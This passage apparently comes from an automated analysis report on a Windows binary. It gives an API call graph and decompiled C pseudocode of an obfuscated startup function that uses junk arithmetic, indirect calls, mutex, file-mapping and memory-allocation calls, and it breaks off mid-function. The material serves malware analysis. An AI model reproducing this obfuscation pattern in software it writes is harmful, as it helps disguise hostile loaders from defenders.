1192e77 10352->10354 10353->10277 10355 118976a _abort 26 API calls 10354->10355 10355->10353 10357 1189c30 IsInExceptionSpec 47 API calls 10356->10357 10358 1189844 10357->10358 10359 1189d7f __fassign 47 API calls 10358->10359 10360 1189854 10359->10360 10360->10291 10361->10271 10365 1194220 10362->10365 10364 11942c6 10364->10187 10366 119422c CallCatchBlock 10365->10366 10376 1191eb0 EnterCriticalSection 10366->10376 10368 119423a 10369 119426c 10368->10369 10370 1194261 10368->10370 10372 1189826 _free 20 API calls 10369->10372 10377 1194349 10370->10377 10373 1194267 10372->10373 10392 1194296 10373->10392 10375 1194289 CallCatchBlock 10375->10364 10376->10368 10378 1191f87 26 API calls 10377->10378 10381 1194359 10378->10381 10379 119435f 10395 1191ef6 10379->10395 10381->10379 10382 1191f87 26 API calls 10381->10382 10391 1194391 10381->10391 10386 1194388 10382->10386 10383 1191f87 26 API calls 10387 119439d CloseHandle 10383->10387 10384 11943d9 10384->10373 10389 1191f87 26 API calls 10386->10389 10387->10379 10390 11943a9 GetLastError 10387->10390 10388 11897f0 __dosmaperr 20 API calls 10388->10384 10389->10391 10390->10379 10391->10379 10391->10383 10404 1191ed3 LeaveCriticalSection 10392->10404 10394 11942a0 10394->10375 10396 1191f6c 10395->10396 10397 1191f05 10395->10397 10398 1189826 _free 20 API calls 10396->10398 10397->10396 10403 1191f2f 10397->10403 10399 1191f71 10398->10399 10400 1189813 __dosmaperr 20 API calls 10399->10400 10401 1191f5c 10400->10401 10401->10384 10401->10388 10402 1191f56 SetStdHandle 10402->10401 10403->10401 10403->10402 10404->10394 10405->10160 10406->10140 9895 118c87a 9898 118b4ba 9895->9898 9899 118b4c3 9898->9899 9900 118b4cc 9898->9900 9901 118b3b9 61 API calls 9899->9901 9901->9900 8718 118daed 8719 118daf9 CallCatchBlock 8718->8719 8743 118e373 8719->8743 8721 118db00 8723 118db29 8721->8723 8783 118dd8f IsProcessorFeaturePresent 8721->8783 8731 118db68 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 8723->8731 8754 118d336 8723->8754 8726 118d2da _abort 5 API calls 8726->8731 8727 118db48 CallCatchBlock 8728 118dbc8 8758 118deaa 8728->8758 8730 118dbce 8762 1181f80 8730->8762 8731->8728 8787 118c2fb 8731->8787 8744 118e37c 8743->8744 8794 118e0be IsProcessorFeaturePresent 8744->8794 8748 118e38d 8749 118e391 8748->8749 8805 11916b7 8748->8805 8749->8721 8752 118e3a8 8752->8721 8757 118d34d 8754->8757 8755 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8756 118d377 8755->8756 8756->8726 8756->8727 8757->8755 8923 118f070 8758->8923 8761 118ded0 8761->8730 8763 1181fda 8762->8763 8764 1182202 8762->8764 8767 1181feb 8763->8767 8768 1182117 8763->8768 8765 1182428 CloseHandle GetCurrentProcessId 8764->8765 8766 1182213 8764->8766 8967 1195ff0 8765->8967 8939 11955c0 8766->8939 8949 1183690 8767->8949 8768->8764 8774 1182165 GetModuleHandleA 8768->8774 8772 118227e 8943 1197440 8772->8943 8773 118207d 8925 1183e70 8773->8925 8961 1198570 8774->8961 8775 11824ab MultiByteToWideChar 8776 1182575 ExitProcess 8775->8776 8780 11820e9 8780->8764 8782 11823f0 8782->8776 8784 118dda5 ___scrt_get_show_window_mode 8783->8784 8785 118de4d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8784->8785 8786 118de97 8785->8786 8786->8721 8788 118d762 IsInExceptionSpec 8787->8788 8789 118c323 try_get_function 8787->8789 8790 1189c30 IsInExceptionSpec 47 API calls 8788->8790 8789->8728 8793 118d773 8790->8793 8791 118a63a _abort 47 API calls 8792 118d79d 8791->8792 8793->8791 8795 118e0e4 8794->8795 8796 118f376 8795->8796 8797 118f37b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 8796->8797 8816 119049e 8797->8816 8800 118f389 8800->8748 8802 118f391 8803 118f39c 8802->8803 8830 11904da 8802->8830 8803->8748 8853 11921e0 8805->8853 8808 118f39f 8809 118f3a8 8808->8809 8810 118f3b9 8808->8810 8811 118f4e9 ___vcrt_uninitialize_ptd 6 API calls 8809->8811 8810->8749 8812 118f3ad 8811->8812 8813 11904da ___vcrt_uninitialize_locks DeleteCriticalSection 8812->8813 8814 118f3b2 8813->8814 8919 1190795 8814->8919 8817 11904a7 8816->8817 8819 11904d0 8817->8819 8821 118f385 8817->8821 8834 1190715 8817->8834 8820 11904da ___vcrt_uninitialize_locks DeleteCriticalSection 8819->8820 8820->8821 8821->8800 8822 118f4b6 8821->8822 8839 119062a 8822->8839 8824 118f4c0 8825 11906d8 ___vcrt_FlsSetValue 6 API calls 8824->8825 8829 118f4cb 8824->8829 8826 118f4d9 8825->8826 8827 118f4e6 8826->8827 8844 118f4e9 8826->8844 8827->8802 8829->8802 8831 1190504 8830->8831 8832 11904e5 8830->8832 8831->8800 8833 11904ef DeleteCriticalSection 8832->8833 8833->8831 8833->8833 8835 1190509 try_get_function 5 API calls 8834->8835 8836 119072f 8835->8836 8837 119074c InitializeCriticalSectionAndSpinCount 8836->8837 8838 1190738 8836->8838 8837->8838 8838->8817 8840 1190509 try_get_function 5 API calls 8839->8840 8841 1190644 8840->8841 8842 119065c TlsAlloc 8841->8842 8843 119064d 8841->8843 8843->8824 8845 118f4f9 8844->8845 8846 118f4f3 8844->8846 8845->8829 8848 1190664 8846->8848 8849 1190509 try_get_function 5 API calls 8848->8849 8850 119067e 8849->8850 8851 1190695 TlsFree 8850->8851 8852 119068a 8850->8852 8851->8852 8852->8845 8856 11921fd 8853->8856 8857 11921f9 8853->8857 8854 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8855 118e39a 8854->8855 8855->8752 8855->8808 8856->8857 8859 119215e 8856->8859 8857->8854 8860 119216a CallCatchBlock 8859->8860 8871 118af81 EnterCriticalSection 8860->8871 8862 1192171 8872 1191e18 8862->8872 8864 1192180 8870 119218f 8864->8870 8885 1191ff2 GetStartupInfoW 8864->8885 8868 11921a0 CallCatchBlock 8868->8856 8896 11921ab 8870->8896 8871->8862 8873 1191e24 CallCatchBlock 8872->8873 8874 1191e48 8873->8874 8875 1191e31 8873->8875 8899 118af81 EnterCriticalSection 8874->8899 8876 1189826 _free 20 API calls 8875->8876 8878 1191e36 8876->8878 8879 118976a _abort 26 API calls 8878->8879 8882 1191e40 CallCatchBlock 8879->8882 8880 1191e80 8907 1191ea7 8880->8907 8882->8864 8884 1191e54 8884->8880 8900 1191d69 8884->8900 8886 119200f 8885->8886 8888 11920a1 8885->8888 8887 1191e18 27 API calls 8886->8887 8886->8888 8889 1192038 8887->8889 8891 11920a8 8888->8891 8889->8888 8890 1192066 GetFileType 8889->8890 8890->8889 8895 11920af 8891->8895 8892 11920f2 GetStdHandle 8892->8895 8893 119215a 8893->8870 8894 1192105 GetFileType 8894->8895 8895->8892 8895->8893 8895->8894 8918 118afc9 LeaveCriticalSection 8896->8918 8898 11921b2 8898->8868 8899->8884 8901 118a67d _abort 20 API calls 8900->8901 8902 1191d7b 8901->8902 8906 1191d88 8902->8906 8910 118a986 8902->8910 8903 118a6da _free 20 API calls 8905 1191dda 8903->8905 8905->8884 8906->8903 8917 118afc9 LeaveCriticalSection 8907->8917 8909 1191eae 8909->8882 8911 118a714 _abort 5 API calls 8910->8911 8912 118a9ad 8911->8912 8913 118a9cb InitializeCriticalSectionAndSpinCount 8912->8913 8914 118a9b6 8912->8914 8913->8914 8915 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8914->8915 8916 118a9e2 8915->8916 8916->8902 8917->8909 8918->8898 8920 119079e 8919->8920 8922 11907c4 8919->8922 8921 11907ae FreeLibrary 8920->8921 8920->8922 8921->8920 8922->8810 8924 118debd GetStartupInfoW 8923->8924 8924->8761 8926 1183ee8 8925->8926 8927 11840d5 8925->8927 8928 1183ef9 8926->8928 8929 11840ec 8926->8929 8927->8780 8969 1183450 8928->8969 8929->8927 8932 118414e CreateFileMappingA 8929->8932 8933 1184135 8932->8933 8933->8929 8934 1198570 2 API calls 8935 1184007 8934->8935 8975 11847e0 8935->8975 8940 1195cbb 8939->8940 8942 1195631 8939->8942 8941 1195d0e ReadFile 8940->8941 8940->8942 8941->8942 8942->8772 8944 11977a4 8943->8944 8948 1182336 8943->8948 8945 1197819 8944->8945 8944->8948 9001 1182800 8945->9001 8947 11978bf 8947->8948 8948->8782 8950 11836fa 8949->8950 8951 118396b 8949->8951 8953 1182800 4 API calls 8950->8953 8952 1182800 4 API calls 8951->8952 8954 1183a1a CreateMutexA GetModuleHandleA 8952->8954 8955 118374f 8953->8955 8956 1195ea0 FindFirstFileA 8954->8956 9007 1181000 8955->9007 8960 1183841 8956->8960 8959 1182590 2 API calls 8959->8960 8960->8773 8962 11985e5 8961->8962 8963 1198747 CreateFileA 8961->8963 8964 1195ea0 FindFirstFileA 8962->8964 8965 119883c 8963->8965 8966 1198642 8964->8966 8965->8780 8966->8965 8968 11962e3 8967->8968 8968->8775 8970 11835fc 8969->8970 8971 11834a4 8969->8971 8970->8934 8972 118354e 8971->8972 8983 1183d10 8971->8983 8972->8970 8974 118363a GetModuleFileNameA 8972->8974 8974->8970 8976 1184849 8975->8976 8977 118406c 8975->8977 8976->8977 8978 1184889 VirtualAlloc 8976->8978 8979 11814c0 8977->8979 8978->8977 8982 118153d 8979->8982 8980 1181588 8980->8927 8982->8980 8993 1198850 8982->8993 8984 1183d80 8983->8984 8985 1183d72 8983->8985 8984->8972 8985->8984 8987 1182590 8985->8987 8990 1182627 8987->8990 8991 1182606 8987->8991 8988 11827c2 GetCurrentActCtx 8989 1182763 8988->8989 8989->8985 8990->8988 8990->8989 8991->8990 8992 118274b GetCommandLineA 8991->8992 8992->8991 8994 11988ba 8993->8994 8995 1198a81 8993->8995 8994->8982 8995->8994 8997 1195ea0 8995->8997 9000 1195ef4 8997->9000 8998 1195f4c 8998->8994 8999 1195fa8 FindFirstFileA 8999->9000 9000->8998 9000->8999 9002 1182861 9001->9002 9003 1182b35 9001->9003 9004 1198850 FindFirstFileA 9002->9004 9005 1182b12 9003->9005 9006 1182b67 GetCurrentActCtx CreateFileA WideCharToMultiByte 9003->9006 9004->9005 9005->8947 9006->8947 9008 118106a 9007->9008 9015 118122f 9007->9015 9009 118107c 9008->9009 9010 1181286 9008->9010 9016 1198330 9009->9016 9013 11812c7 WideCharToMultiByte CreateFileMappingA CreateMutexA 9010->9013 9010->9015 9013->9015 9015->8959 9017 119838d 9016->9017 9018 118110b 9016->9018 9019 1198489 9017->9019 9020 119839f 9017->9020 9023 1183250 9018->9023 9019->9018 9022 11984cc SetHandleInformation 9019->9022 9029 1183c20 9020->9029 9022->9019 9024 11832bb 9023->9024 9027 11832c8 9023->9027 9026 11832ea CloseHandle 9024->9026 9024->9027 9025 118331a 9025->9015 9026->9027 9027->9025 9028 11833f5 FindNextFileA 9027->9028 9028->9027 9030 1183c97 ReleaseMutex 9029->9030 9031 1183c77 9029->9031 9030->9031 9031->9018 10458 1189def 10459 1189dfb CallCatchBlock 10458->10459 10460 1189e32 CallCatchBlock 10459->10460 10466 118af81 EnterCriticalSection 10459->10466 10462 1189e0f 10463 118aef0 __fassign 20 API calls 10462->10463 10464 1189e1f 10463->10464 10467 1189e38 10464->10467 10466->10462 10470 118afc9 LeaveCriticalSection 10467->10470 10469 1189e3f 10469->10460 10470->10469

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                                                                                                                                      			E01181F80() {
                                                                                                                                                                                                                                                                      				intOrPtr _t287;
                                                                                                                                                                                                                                                                      				intOrPtr _t302;
                                                                                                                                                                                                                                                                      				intOrPtr _t303;
                                                                                                                                                                                                                                                                      				intOrPtr _t309;
                                                                                                                                                                                                                                                                      				intOrPtr _t322;
                                                                                                                                                                                                                                                                      				signed int _t325;
                                                                                                                                                                                                                                                                      				signed int _t327;
                                                                                                                                                                                                                                                                      				signed int _t344;
                                                                                                                                                                                                                                                                      				intOrPtr _t345;
                                                                                                                                                                                                                                                                      				intOrPtr _t348;
                                                                                                                                                                                                                                                                      				intOrPtr _t356;
                                                                                                                                                                                                                                                                      				signed int _t394;
                                                                                                                                                                                                                                                                      				signed int _t398;
                                                                                                                                                                                                                                                                      				intOrPtr _t402;
                                                                                                                                                                                                                                                                      				intOrPtr _t413;
                                                                                                                                                                                                                                                                      				signed int _t437;
                                                                                                                                                                                                                                                                      				intOrPtr _t452;
                                                                                                                                                                                                                                                                      				signed int _t458;
                                                                                                                                                                                                                                                                      				intOrPtr _t466;
                                                                                                                                                                                                                                                                      				intOrPtr _t468;
                                                                                                                                                                                                                                                                      				intOrPtr _t482;
                                                                                                                                                                                                                                                                      				intOrPtr _t486;
                                                                                                                                                                                                                                                                      				intOrPtr _t487;
                                                                                                                                                                                                                                                                      				intOrPtr _t519;
                                                                                                                                                                                                                                                                      				intOrPtr* _t520;
                                                                                                                                                                                                                                                                      				void* _t521;
                                                                                                                                                                                                                                                                      				void* _t522;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t520 = _t521 - 0x68;
                                                                                                                                                                                                                                                                      				_t522 = _t521 - 0xc0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t520 + 0x64)) = 0x121d5f0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xf8)) =  *((intOrPtr*)(_t520 + 0x78));
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x58) = 0x2565;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x4c) = 0x24c7;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x5c) = 0x2506;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x60) = 0x2622;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x54) = 0x24c7;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x50) = 0x2565;
                                                                                                                                                                                                                                                                      				if( *(_t520 + 0x54) < ( *(_t520 + 0x50) ^ 0x00000347)) {
                                                                                                                                                                                                                                                                      					if( *(_t520 + 0x58) >  *(_t520 + 0x4c) + 0x161) {
                                                                                                                                                                                                                                                                      						__eflags =  *(_t520 + 0x58) - ( *(_t520 + 0x5c) ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc71)) -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc);
                                                                                                                                                                                                                                                                      						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                      							__eflags =  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) -  *(_t520 + 0x4c) *  *0x0121D694 *  *0x121d62c;
                                                                                                                                                                                                                                                                      							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                      								 *(_t520 + 0x18) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c);
                                                                                                                                                                                                                                                                      								GetModuleHandleA( *(_t520 + 0x18));
                                                                                                                                                                                                                                                                      								 *(_t520 + 4) =  *(_t520 + 0x60) -  *(_t520 + 0x60) ^ 0x00002801;
                                                                                                                                                                                                                                                                      								 *(_t520 + 8) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                                      								_t322 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								 *(_t520 + 0xc) = ( *(_t520 + 0x60) | 0x000024c7) *  *(_t322 + 0xbadc81);
                                                                                                                                                                                                                                                                      								_t413 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t520 + 0x10)) = _t413;
                                                                                                                                                                                                                                                                      								_t325 =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c) &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbc1);
                                                                                                                                                                                                                                                                      								__eflags = _t325;
                                                                                                                                                                                                                                                                      								 *(_t520 + 0x14) = _t325;
                                                                                                                                                                                                                                                                      								_t327 = E01198570( *(_t520 + 4),  *(_t520 + 8),  *(_t520 + 0xc),  *((intOrPtr*)(_t520 + 0x10)),  *(_t520 + 0x14));
                                                                                                                                                                                                                                                                      								_t522 = _t522 + 0x14;
                                                                                                                                                                                                                                                                      								 *(_t520 + 0x5c) = _t327;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x0000003d;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x4c) =  *(_t520 + 0x4c) ^ 0x000002ef;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0x218;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x54) =  *(_t520 + 0x54) + 0x161;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000002ad;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x34)) =  *(_t520 + 0x50) + 0x254;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x38)) =  *(_t520 + 0x58) - 0x2a;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x3c)) =  *(_t520 + 0x4c) - 0xc3;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x40)) =  *(_t520 + 0x58) + 0x2d5;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x44)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x48) =  *(_t520 + 0x54) ^ 0x000000af;
                                                                                                                                                                                                                                                                      						_push( *(_t520 + 0x48));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x44)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x40)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x3c)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x38)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x34)));
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x60) = E01183690();
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000001a5;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x1c)) =  *(_t520 + 0x60) - 0xbd;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x20) =  *(_t520 + 0x54) ^ 0x000003b0;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x24)) =  *(_t520 + 0x54) + 0xac;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x28)) =  *(_t520 + 0x5c) - 0x9b;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x2c)) =  *(_t520 + 0x58) - 0x5f;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x30)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x30)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x2c)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x28)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x24)));
                                                                                                                                                                                                                                                                      						_push( *(_t520 + 0x20));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x1c)));
                                                                                                                                                                                                                                                                      						_t344 = E01183E70();
                                                                                                                                                                                                                                                                      						_t522 = _t522 + 0x30;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x58) = _t344;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x54) =  *(_t520 + 0x54) - 0x161;
                                                                                                                                                                                                                                                                      						_t519 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t345 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t68 = _t345 + 0x94; // 0x1452000
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t519 + 0x90)) =  *_t68;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *(_t520 + 0x54) > ( *(_t520 + 0x58) ^ 0x00000d01)) {
                                                                                                                                                                                                                                                                      					_t437 =  *0x121d628; // 0x1
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x38) = _t437 &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xac);
                                                                                                                                                                                                                                                                      					CloseHandle( *(_t520 - 0x38));
                                                                                                                                                                                                                                                                      					_t348 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t202 = _t348 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x50) =  *(_t520 + 0x50) -  *_t202 +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xb4));
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x50) =  *(_t520 + 0x50) |  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) *  *0x0121D694 -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                                      					GetCurrentProcessId();
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x40)) = 0x28ec;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x3c)) = 0x3c28;
                                                                                                                                                                                                                                                                      					 *0x121df10 = E01195FF0(__eflags,  *((intOrPtr*)(_t520 - 0x40)),  *((intOrPtr*)(_t520 - 0x3c)));
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x58) =  *(_t520 + 0x54) &  *0x01DCB1DD;
                                                                                                                                                                                                                                                                      					_t356 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t222 = _t356 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x54) =  *(_t520 + 0x60) +  *_t222;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x50) =  *(_t520 + 0x50) * 0x26e5 *  *(_t520 + 0x60);
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x4c) =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14) ^ 0x000026d4;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x48) =  *(_t520 + 0x50) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xa4)) |  *(_t520 + 0x54);
                                                                                                                                                                                                                                                                      					_t452 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t238 = _t452 + 0xb4; // 0x0
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x44) =  *_t238 *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                                      					MultiByteToWideChar( *(_t520 - 0x58),  *(_t520 - 0x54),  *(_t520 - 0x50),  *(_t520 - 0x4c),  *(_t520 - 0x48),  *(_t520 - 0x44));
                                                                                                                                                                                                                                                                      					_t458 =  *(_t520 + 0x5c) | ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc51) &  *0x121d6cc) - 0x000027b9;
                                                                                                                                                                                                                                                                      					__eflags = _t458;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x5c) = _t458;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x39;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x18)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x14)) =  *(_t520 + 0x60) + 6;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x10) =  *(_t520 + 0x60) ^ 0x000003ba;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0xc) =  *(_t520 + 0x5c) ^ 0x0000001b;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 8)) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                                      					 *(_t520 - 4) =  *(_t520 + 0x4c);
                                                                                                                                                                                                                                                                      					 *_t520 =  *(_t520 + 0x50) + 0x16f;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x60) = E011955C0( *((intOrPtr*)(_t520 - 0x18)),  *((intOrPtr*)(_t520 - 0x14)),  *(_t520 - 0x10),  *(_t520 - 0xc),  *((intOrPtr*)(_t520 - 8)),  *(_t520 - 4),  *_t520);
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                                      					_t466 =  *0x121d69c; // 0x1a0e74
                                                                                                                                                                                                                                                                      					_t287 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t136 = _t287 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      					_t468 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t468 + 0x58)) =  *_t136 - _t466 - 0x1a0ed5;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x54) =  *(_t520 + 0x54) ^ 0x000002f4;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x60) =  *(_t520 + 0x60) - 0x3b;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x50) =  *(_t520 + 0x50) - 0x5f;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x34)) =  *(_t520 + 0x58) + 0xf8;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x30)) =  *(_t520 + 0x4c) - 0x90;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x2c)) =  *(_t520 + 0x5c) - 0xb;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x28)) =  *(_t520 + 0x60) + 0x254;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x24) =  *(_t520 + 0x58) ^ 0x000003de;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x20)) =  *(_t520 + 0x54) - 0x93;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x1c)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x5c) = E01197440( *((intOrPtr*)(_t520 - 0x34)),  *((intOrPtr*)(_t520 - 0x30)),  *((intOrPtr*)(_t520 - 0x2c)),  *((intOrPtr*)(_t520 - 0x28)),  *(_t520 - 0x24),  *((intOrPtr*)(_t520 - 0x20)),  *((intOrPtr*)(_t520 - 0x1c)));
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x4c) =  *(_t520 + 0x4c) + 0xac;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0xbd;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x38)) >=  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14)) {
                                                                                                                                                                                                                                                                      						_t302 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t178 = _t302 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      						_t303 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t394 =  *_t178 +  *((intOrPtr*)(_t303 + 0x74)) ^  *0x121d6d0 ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                                      						__eflags = _t394;
                                                                                                                                                                                                                                                                      						 *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0) = _t394;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t487 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t176 = _t487 + 0x94; // 0x1452000
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x64)) =  *_t176;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t482 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t187 = _t482 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x9c)) <=  *_t187) {
                                                                                                                                                                                                                                                                      						_t398 = ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xac) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbdd))) *  *0x121d67c;
                                                                                                                                                                                                                                                                      						__eflags = _t398;
                                                                                                                                                                                                                                                                      						 *0x121d67c = _t398;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t486 =  *0x121d6d8; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t309 =  *0x121d654(_t486,  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x90)) +  *0x121d6e0,  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xf8)));
                                                                                                                                                                                                                                                                      						_t402 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t402 + 0xc0)) = _t309;
                                                                                                                                                                                                                                                                      					}
